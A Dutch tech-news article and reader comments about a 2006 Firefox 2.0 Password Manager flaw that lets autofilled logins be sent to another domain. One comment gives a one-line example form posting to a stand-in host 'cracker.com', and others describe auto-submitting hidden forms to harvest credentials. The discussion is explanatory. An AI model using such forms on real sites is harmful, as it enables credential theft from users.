Cookies op Tweakers

Tweakers maakt gebruik van cookies, onder andere om de website te analyseren, het gebruiksgemak te vergroten en advertenties te tonen. Door gebruik te maken van deze website, of door op 'Ga verder' te klikken, geef je toestemming voor het gebruik van cookies. Wil je meer informatie over cookies en hoe ze worden gebruikt, bekijk dan ons cookiebeleid.

Meer informatie

Door , , 81 reacties
Bron: Mozilla, submitter: Maasluip

De Mozilla Foundation heeft bekendgemaakt dat Firefox 2.0 een lek bevat, waarmee wachtwoorden uit de Password Manager openbaar kunnen worden gemaakt. Volgens onbevestigde berichten heeft Internet Explorer hetzelfde gebrek.

Rood Firefox-logo Dankzij de bug kunnen de gebruikersnaam en het wachtwoord naar een ander domein worden doorgegeven dan waarvoor ze bedoeld zijn. Met behulp van javascript kan een form met de gebruikersgegevens zelfs vrijwel onzichtbaar door een hacker worden opgevraagd, zodat phishers zich de moeite van een goedgelijkende website kunnen besparen: een gebruiker hoeft een website maar te bezoeken en zijn wachtwoord ligt op straat. Het is overigens wel vereist dat de phishing-code op het domein wordt gehost waarvoor het password bedoeld is, maar accounts op sites waar gebruikers zelf html kunnen publiceren, zoals MySpace, zijn dankzij deze bug zeer kwetsbaar.

Lek nummer 360493 staat inmiddels bekend als de 'Reverse Cross-Site Request-vulnerability', en de eerste exploits zijn al in het wild gesignaleerd. Het verdient dan ook aanbeveling om de Password Manager van Firefox voorlopig uit te schakelen. Een alternatief is het gebruik van de Master Password Timeout-extensie, die het lek niet dicht maar in elk geval voor een waarschuwing kan zorgen. Een structurele oplossing voor het 'bijzonder ernstig' genoemde lek is in de maak; Mozilla-ontwikkelaars beschouwen dit lek als 'blocking', wat zoveel wil zeggen als dat een volgende versie van de opensourcebrowser niet zonder een oplossing uitgebracht mag worden.

Update, 14:38: de tekst is aangepast om te verduidelijken dat de phishingcode onder het domein moet draaien waarvan de accounts aangevallen worden.

Lees meer over

Gerelateerde content

Alle gerelateerde content (25)
Moderatie-faq Wijzig weergave

Reacties (81)

Samenvatting van het bugreport:
- firefox kijkt bij het automatisch invullen van een formulier naar de URL waar het formulier naar verwijst.
- firefox kijkt bij het automatisch invullen niet naar welke URL het formulier gestuurd wordt, alleen naar de site waar deze staat (dank Olaf!)
- uit de password manager worden de gegevens ingevuld van het formulier.
- er wordt niet gekeken naar de eigenlijke site waar dit formulier staat!

Je kunt dus een formulier namaken maken op een andere site, Je kunt dus op MySpace het inlog formulier nabouwen op je space. Firefox zal het gebruikersnaam/wachtwoord doodleuk automatisch invullen. Daarna kan die site het uitlezen en opsturen.

MSIE blijkt ook zoiets te hebben.
Niet helemaal. het formulier moet wel op het domein gehost worden waar het password bijhoort, alleen kan er dus in dat formulier wel code gestopt worden die de ingevulde gegevens naar een derde partij stuurt.

Dus om mijn tweakers.net wachtwoord te achterhalen moet je wel een malafide formulier hier op tweakers.net neerzetten. En laat dat laatste hier op tweakers.net nou niet echt kunnen.

Er zijn echter een boel fora en dergelijke waar elke user gewoon html rechten enzo heeft. Daar is het wel gevaarlijk.
Volgens de onderzoekers van FireFox is het risico van IE in dit geval toch een stuk kleiner:
> Do we know exactly what IE does differently that causes the myspace attack to
> fail in IE?

IE appears to associate the password with each page URL, so I have to be
re-save on each login page, even in the same site. Still, IE shows no
warnings. The MySpace phish is successful if the user is willing to type in
their password.
Een phishing attack via hetzelfde domein is in het specifieke geval van MySpace mogelijk omdat myspace vrijelijk html code toelaat in je space, inclusief het maken van een pagina die lijkt op de "echte" myspace login. Bij FireFox is het echter mogelijk dat een heel ander domein de login info phisht, de melder van de bug vond dat zijn myspace info gejat werd door een pagina op membres.lycos.fr.
Maar dat script op members.lycos.fr werd daarvoor wel ingebakken in een myspace profiel :)

Dus het probleem doet zich alleen voor op sites waar je als gebruiker html en dergelijke mag posten.

De aanpak van IE is dan inderdaad wel beter.
Samenvatting van het bugreport:
Je hebt het precies verkeerd om. Firefox kijkt naar de URL waar het form op staat, maar niet waar het naartoe gaat.

Dat is dus minder erg.
En hoe zorg ik er nu voor dat het T.net form naar mijn URL wordt dooregstuurd?
<form action="http://cracker.com/"> ergens op http://tweakers.net/ zetten.
MSIE blijkt ook zoiets te hebben.
Bij IE is dat geen bug! Dat is een feature! ;)
Als ik het goed begrijp is deze bug alleen gevaarlijk als je óf: geen master password hebt ingesteld, óf: je master password zojuist hebt ingetikt en in dezelfde sessie (of binnen de timeout van genoemde plugin) op een site komt met betreffende exploit.
Of je gebruikt de password manager gewoon helemaal niet :D
Vanwege dat enorme aantal forms en accounts dat je tegenwoordig om de oren gesmeten wordt is het onmogelijk om dat ene onbelangrijke accountje van vorig jaar maart nog te onthouden...

Je ontkomt er gewoon niet aan om een en ander ergens op te slaan, en als het om onbelangrijke accounts gaat zoals bijvoorbeeld iets van youtube, interesseert het me geen hol of het onveilig is :)
Ik vind het veel onveiliger om één wachtwoord te gebruiken voor al mijn accounts. Dan kan ik het wel onthouden, maar dan zou ik bijvoorbeeld Youtube het wachtwoord geven dat ook al voor Gmail gebruikt wordt. Veel onveiliger naar mijn idee.

Oh en voor de mensen die hem nog niet kennen: bugmenot.com is dé repository voor wegwerpaccounts :)
Verbaasd me dat dit nu pas ontdekt wordt. Ik had altijd bij phpBB dat wanneer ik een user editte FF mijn log-in naam en wachtwoord erop zette. Omdat dit hetzelfde domein is kon ik het wel "begrijpen", maar raar dat niemand ooit geprobeerd heeft die domeinen te spoofen.
Inderdaad, heb ik ook altijd bij het forum van mn vriendin. Je zou toch zeggen dat de makers van FF dit wel gezien zouden hebben?

- HyPz
Heeft helemaal niets met de zaak te maken. Je zit op een bepaalde url waarvoor een paswoord is opgeslagen, en de browser komt een form tegen met een veld in dat "password" heet en vult het paswoord voor die site gewoon in, daar is helemaal niets mis mee, is evengoed zo in alle andere browsers.

Hetgeen de browser invult in die velden wordt helemaal niet over het net verstuurd tenzij jij de submit button indrukt, is gewoon de waarde van een input veld zetten, wat locaal is.

De bug bestaat er gewoon uit dat een site een (verborgen) form kan plaatsen op een webpage op een bepaalde manier zodat de browser *denkt* dat ie op het andere bewuste domein zit en automatisch je username & paswoord invult voor dat domein. Dan even auto submitten met een javascriptje en je hebt de login gegevens.
Heeft helemaal niets met de zaak te maken.
Euhm, juist wel. Wat jij in je 3e alinea beschrijft is nauwelijks anders dan het gedrag wat de twee mensen waar je op reageerd beschrijven. Waar jij de fout in gaat is dat het weinig met het spoofen van de site te maken heeft. Je zult nog steeds daadwerkelijk een form op de bij het wachtworod horende site moeten kunnen zetten. Er zijn echter genoeg sites waarbij het redelijk makkelijk is voor gebruikers om zelf html te kunnen plaatsen (zoals het youtube voorbeeld).

Wat jij in je tweede alinea zegt is natuurlijk ook makkelijk te omzeilen. Natuurlijk staat de inhoud op het form alleen lokaal, maar met een stukje javascript en een leuk xmlrequest kan ik die waardes zo via internet naar mijn credential harvest databaseje versturen.
Juist niet. Zij beschrijven dat 1 website met twee verschillende gebruikers binnen 1 domein dat FF dan de form invuld. Hier doet ie niets fout, hier doen de users iets fout, ze zouden moeten switchen van user profiel wat ze niet doen. Hier kun je FF weinig kwaad nemen.
what Blizzy beschrijft in de laatste alinea is dat een kwaadaardige site zich voordoet met een form van een bekende site met een gelijke code waardoor FF denkt te zijn op bv hotmail qua form, deze hoef jij niet eens te zien. Maar FF vult hem wel keurig in terwijl jij dat niet weet en als de site een beetje handig in elkaar zit zoals aangegeven is kan een beetje script zelf wel een POST veroorzaken.
Maar dit gebeurd dus alleen onder uitzonderlijke voorwaarden zoals Merovingian in het begin al beschrijft. Kleine kans dus dat zoiets voorkomt echter slordig dat het kan. Echter het wordt dus wel verholpen in de komende build.
Maar er is ook goed nieuws: nu weten we eindelijk wat de samenwerking tussen Mozilla en Microsoft inhoudt! :+
Leuk dat dit allemaal critical is, maar je moet dus wel eerst ervoor zorgen dat je op die bepaalde site je form kan neerzetten :)

Het blijft uiteraard een kwalijke zaak, maar om nou te zeggen dat het praktisch voor elke willekeurige site mogelijk is...

Misschien geeft deze bug niet alleen de fout aan in FF (en IE), maar ook de fout bij MySpace.com ;)
Inderdaad, je kan op je klompen aanvoelen dat het niet handig is je gebruikers zonder restricties HTML te laten posten op jouw domein ;)
En laat MySpace nou door heel veel mensen (uit amerika) gebruikt worden. Dus het is zeker wel een groot gevaar.
myspace heeft dan nog wel meer gevaren, gebruikers kunnen dus ook javascripts plaatsen die myspace cookies van ingelogde gebruikers uitlezen, en misschien kunnen ze daarmee de profielen van die gebruikers bewerken etc. Dus ja, Firefox heeft een fix nodig, maar sites zoals myspace dus ook.
Blijk dat ik nooit wachtwoorden laat onthouden door de browser. Gewoon even de moeite nemen om die paar lettertjes in te tikken maakt het weer een stuk veiliger :)
Gewoon even de moeite nemen om die paar lettertjes in te tikken maakt het weer een stuk veiliger
Niet dus. Ook dan kun je last hebben van deze bug.
Leuk als je voor alle sites hetzelfde paswoord gebruikt natuurlijk. Ik heb voor elke site een ander paswoord. Nuja, ik gebruik dat ding evengoed niet, ik heb een aparte pasword mananger.
Ik heb voor elke site een ander password (behalve voor sites die mij absoluut niet interesseren en ook totaal geen potentieel gevaar opleveren) en toch maak ik geen gebruik van een password manager. :) Ik maak gebruik van een systeem dat voor mij logisch is, maar het nadeel daarvan is dan weer dat als iemand dat systeem achterhaalt, hij ook met een beetje werk een gedeelte van de wachtwoorden voor andere sites kan achterhalen. :P
dit is al een hele tijd bekend.

heb er bvb ook al melding van gemaakt bij world of warcraft support na een golf van hacks.(checked mail 2006/09/23)

heb de link niet meer waar alles uitgelegd werd maar die kan ik niet meer vinden

hij had een eenvoudige extensie gemaakt die dus je password en login uit je je password manager haalde en vervolgens doorstuurde naar maker van de extensie.

niet zo netjes dus
Dat heeft hier dus weer helemaal niks mee te maken.

En inderdaad, extensies installeren brengt een risico met zich mee, daarom moet je ook niet zomaar elke extensie installeren.
Een structurele oplossing voor het 'bijzonder ernstig' genoemde lek is in de maak;
Een structurele oplossing is het gebruik van public key authentication in plaats van plaintext passwords.
Ah, maar dan ben je afhankelijk van de site aan de andere kant. En het probleem wordt er niet mee opgelost, want er wordt nog steeds geheime informatie opgeslagen en gebruikt: in plaats van plaintext wachtwoorden heb je dan sleutels.

Tenzij je een challenge/response systeem wilt gebruiken, maar dat kan ook met een password. (gewoon een hash van password en sessieid sturen, elke keer anders)

Dit is een fout aan het eindpunt die opgeslagen (geheime) informatie geeft. Wat die informatie is maakt niet uit. Door dat te wijzigen los je het probleem niet op.

@Olaf van der Spek:
challenge/response:
Een geheim deeltje informatie gebruik je om een response te genereren, tezamen met je challenge informatie. Dat stuur je terug. Die geheime informatie staat opgeslagen op de harde schijf, net als de wachtwoorden in dit geval.

Als je met een challenge/response systeem werkt, maakt het niet uit of die geheime data een sleutel of een password is: het is toch niet de geheime data die je terug stuurt.

Sleutels hebben andere voordelen: ze zijn veel moeilijker te kraken voor iemand die de response leest. Passwords hebben wat minder informatie, en daarom sneller te raden. Daarentegen zijn ze veel makkelijker te transporteren tussen computers.
Ah, maar dan ben je afhankelijk van de site aan de andere kant.
Natuurlijk.
En het probleem wordt er niet mee opgelost, want er wordt nog steeds geheime informatie opgeslagen en gebruikt: in plaats van plaintext wachtwoorden heb je dan sleutels.
Het verschil is dat de private keys nooit toegankelijk zijn voor de pagina of dat ze zelfs niet toegangkelijk zijn voor de browser.
Tenzij je een challenge/response systeem wilt gebruiken, maar dat kan ook met een password. (gewoon een hash van password en sessieid sturen, elke keer anders)
Dan heb je last van het issue waar dit nieuwsbericht over gaat.
Dit is een fout aan het eindpunt die opgeslagen (geheime) informatie geeft. Wat die informatie is maakt niet uit. Door dat te wijzigen los je het probleem niet op.
In tegendeel. Of het password in de password manager zit maakt niet uit. Juist door dat password te vervangen door een veilige response op een challenge voorkom je dit hele circus.
@Olaf van der Spek:
challenge/response:
Ik weet wat challenge/response is. Maar vaak wordt dit gewoon in JS geimplementeerd en dan heb je nog steeds last van deze exploit.
Dit is al mogelijk door een client SSL certificate te gebruiken. Je private key versleutelt dan de SSL connectie, en kan gematcht worden met een public key op de server.

In België heeft iedere burger met een elektronische identiteitskaart trouwens speciaal voor dit doel een "authentication certificate" op zijn kaart. Je steekt je kaart dus in een lezer, geeft je pincode in, en je private key kan ingezet worden door je browser. Bovendien kan de server gebruik maken van "CRL", waardoor de server het altijd weet als een kaart ingetrokken wordt wegens verlies of diefstal. Bijna volledige veiligheid dus!
Bijna volledige veiligheid dus!
En totaal geen anonimiteit/privacy. :r
Heb je uberhaupt wel eens gekeken naar wat redenen zijn om voor Firefox te kiezen? Bij mij is dat bijvoorbeeld omdat Internet Explorer simpelweg niet wil werken onder FreeBSD, of dat ik moeite moet gaan doen met Wine. Ik heb niks tegen IE, sterker nog, soms is IE beter omdat bijv. de site xbox.com ook niet zo lekker werkt op Firefox.

Elk programma bevat bugs. FreeBSD bevat bugs, Linux bevat bugs, Windows bevat bugs, IE bevat bugs, Opera bevat bugs, Firefox bevat bugs. Het is gewoon een kwestie van wat je zelf het lekkerst vindt werken.
Volgens onbevestigde berichten heeft Internet Explorer hetzelfde gebrek.
Inderdaad, "onvoorstelbaar slecht" maar als je goed kan lezen merk je ook dat je geliefkoosde IE het er niet beter van afbrengt. Zoiets valt uiteraard niet goed te praten maar software is nu eenmaal onderhevig aan bugs. ;)

Vergeet ook niet dat Microsoft al veel langer bezig was met IE en dus logischerwijs ook meer tijd (en wellicht mankracht) ter beschikking had om hun browser te verbeteren, de Mozilla jongens zijn nog maar enkele jaren aan de slag met de toen verouderde Netscape codebase...

En als je vindt dat Firefox er amateuritisch uitziet kan je altijd een andere theme gebruiken zodat ie voor jou wat "futuristischer", of moet ik zeggen "recenter" lijkt. ;) Het is over het algemeen gewoon een goede browser die zeker niet voor bijvoorbeeld IE zou moeten onderdoen, vind jij dat wel dan zit het volgens mij allemaal in je hoofd.
Amateuristisch? Ik vind FF persoonlijk stukken beter uitzien dan IE7. Maar dat is persoonlijk.

Feit is dat er zoveel problemen zijn met IE dat dit geen FP-nieuws meer is. En als er dan eens een bug in FF zit staat het meteen op de FP.

FF is nog altijd véél veiliger dan IE.

M'n nichtje had altijd spyware op haar PC ondanks dat ik altijd alle patches en virusscanner enzo installeerde. Iexplore.exe geblokkeerd, FF geinstalleerd, 75% minder spyware.
...Volgens onbevestigde berichten heeft Internet Explorer hetzelfde gebrek...
Wat ben je toch maar een naar mannetje :r
Ja wat moet ik nu gebruiken! IE 7 of FF2?

Achja, dan maar bij een oudere versie van FF..

Maar nu even serieus, ik vind dit echt een verkeerde zaak. Ik ben geen programmeur (naja php dan), maar hoe kan het in godsnaam zover komen dat mensen met een _script_ gegevens van een lokaal programma kunnen lezen :?.

Ik maak redelijk veel gebruik van de FF password manager, leuk om te horen dat het nu zeer gevaarlijk is.
De browser stopt de gegevens vrijwillig en automatisch in de velden van het (inlog-)formulier. Het script haalt het niet op uit het programma.
Maar je hebt wel een script nodig om dat formuliertje ongezien te verzenden

*is heel blij met de no-script extensie *
Je hebt niet eens een script nodig.
Ja wat moet ik nu gebruiken! IE 7 of FF2
Opera 9 dus ;-)

Op dit item kan niet meer gereageerd worden.



Apple iOS 10 Google Pixel Apple iPhone 7 Sony PlayStation VR AMD Radeon RX 480 4GB Battlefield 1 Google Android Nougat Watch Dogs 2

© 1998 - 2016 de Persgroep Online Services B.V. Tweakers vormt samen met o.a. Autotrack en Carsom.nl de Persgroep Online Services B.V. Hosting door True